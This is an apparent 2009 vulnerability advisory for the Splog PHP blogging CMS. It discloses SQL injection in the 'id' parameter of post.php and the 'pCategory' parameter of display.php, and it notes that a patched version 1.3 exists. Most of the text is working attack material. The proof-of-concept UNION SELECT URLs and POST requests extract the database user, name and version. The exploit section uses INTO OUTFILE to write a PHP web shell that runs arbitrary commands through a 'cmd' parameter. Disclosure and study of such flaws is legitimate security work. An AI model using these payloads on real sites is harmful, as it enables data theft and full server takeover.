MULTIPLE SQL INJECTION VULNERABILITIES --Splog <= v-1.2 Beta-->

Thu, 11 Jun 2009 08:32:40 -0700 

-----------------------------------------------------------------

MULTIPLE SQL INJECTION VULNERABILITIES --Splog <= v-1.2 Beta-->

-----------------------------------------------------------------



CMS INFORMATION:



-->WEB: http://sourceforge.net/projects/splog/

-->DOWNLOAD: http://sourceforge.net/projects/splog/

-->DEMO: N/A

-->CATEGORY: CMS / Blogging

-->DESCRIPTION: Splog is a simple PHP and MySQL blogging framework allowing

                full integration into a website by being designed for use...

-->RELEASED: 2009-06-01



CMS VULNERABILITY:



-->TESTED ON: firefox 3

-->DORK: N/A

-->CATEGORY: SQL INJECTION

-->AFFECT VERSION: <= 1.2-Beta (Checked previous versions are also vulns)

-->Discovered Bug date: 2009-06-08

-->Reported Bug date: 2009-06-09

-->Fixed bug date: 2009-06-10

-->Info patch (1.3): http://sourceforge.net/projects/splog/

-->Author: YEnH4ckEr

-->mail: y3nh4ck3r[at]gmail[dot]com

-->WEB/BLOG: N/A

-->COMMENT: A mi novia Marijose...hermano,cunyada, padres (y amigos xD) por su 
apoyo.

-->EXTRA-COMMENT: Gracias por aguantarme a todos! (Te kiero xikitiya!)







#########################

////////////////////////



SQL INJECTION (SQLi):



////////////////////////

#########################





-------------------

PROOF OF CONCEPT:

-------------------





<<<<---------++++++++++++++ Condition: magic quotes=OFF/ON 
+++++++++++++++++--------->>>>







[++] GET var --> 'id'



[++] File vuln --> 'post.php'





~~~~~> 
http://[HOST]/[PATH]/post.php?id=-1+UNION+SELECT+1,user(),database(),version(),user(),database()%23







<<<<---------++++++++++++++ Condition: magic quotes=OFF 
+++++++++++++++++--------->>>>





[++] POST var --> 'pCategory'



[++] File vuln --> 'display.php'





POST http://[HOST]/[PATH]/display.php HTTP/1.1

Host: [HOST]

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.10) 
Gecko/2009042316 Firefox/3.0.10

Referer: http://[HOST]/[PATH]/display.php

Content-Type: application/x-www-form-urlencoded

pCategory=-1'+UNION+SELECT+1,2,3,4,5,6# <--- INJECTION





[++[Return]++] ~~~~~> user, version or database.





----------

EXPLOIT:

----------





<<<<---------++++++++++++++ Extra-Condition: privileges to create files 
+++++++++++++++++--------->>>>





[GET]~~~~~> 
http://[HOST]/[PATH]/post.php?id=-1+UNION+ALL+SELECT+'<HTML><title>SPLOG <= 1.2 
Beta--SHELL BY --Y3NH4CK3R--></title>','<body text=ffffff 
bgcolor=000000><center><h1>YOUR SHELL IS ON!<br>','</h1></center><br><br><font 
color=ff0000><h2>Get var (cmd) to execute comands. Enjoy 
it!</h2>','</font><h3>Command Result:</h3><?php system($_GET[cmd]); 
?>','<br><br><font color=ff0000>','<h3>By y3nh4ck3r. Contact: 
[email protected]</h3></font></body></HTML>'+INTO+OUTFILE+'[COMPLETE-PATH]/shell.php'%23



[POST]~~~~~>



POST http://[HOST]/[PATH]/display.php HTTP/1.1

Host: [HOST]

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.10) 
Gecko/2009042316 Firefox/3.0.10

Referer: http://[HOST]/[PATH]/display.php

Content-Type: application/x-www-form-urlencoded

pCategory=-1'+UNION+ALL+SELECT+'<HTML><title>SPLOG <= 1.2 Beta--SHELL BY 
--Y3NH4CK3R--></title>','<body text=ffffff bgcolor=000000><center><h1>YOUR 
SHELL IS ON!<br>','</h1></center><br><br><font color=ff0000><h2>Get var (cmd) 
to execute comands. Enjoy it!</h2>','</font><h3>Command Result:</h3><?php 
system($_GET[cmd]); ?>','<br><br><font color=ff0000>','<h3>By y3nh4ck3r. 
Contact: 
[email protected]</h3></font></body></HTML>'+INTO+OUTFILE+'[COMPLETE-PATH]/shell.php'#
 <--- INJECTION





[++[Return]++] ~~~~~> Your shell in http://[HOST]/[PATH]/shell.php









#######################################################################

#######################################################################

##*******************************************************************##

##  SPECIAL GREETZ TO: Str0ke, JosS, Ulises2k, J. McCray, Evil1 ...  ##

##*******************************************************************##

##-------------------------------------------------------------------##

##*******************************************************************##

##              GREETZ TO: SPANISH H4ck3Rs community!                ##

##*******************************************************************##

#######################################################################

#######################################################################

Reply via email to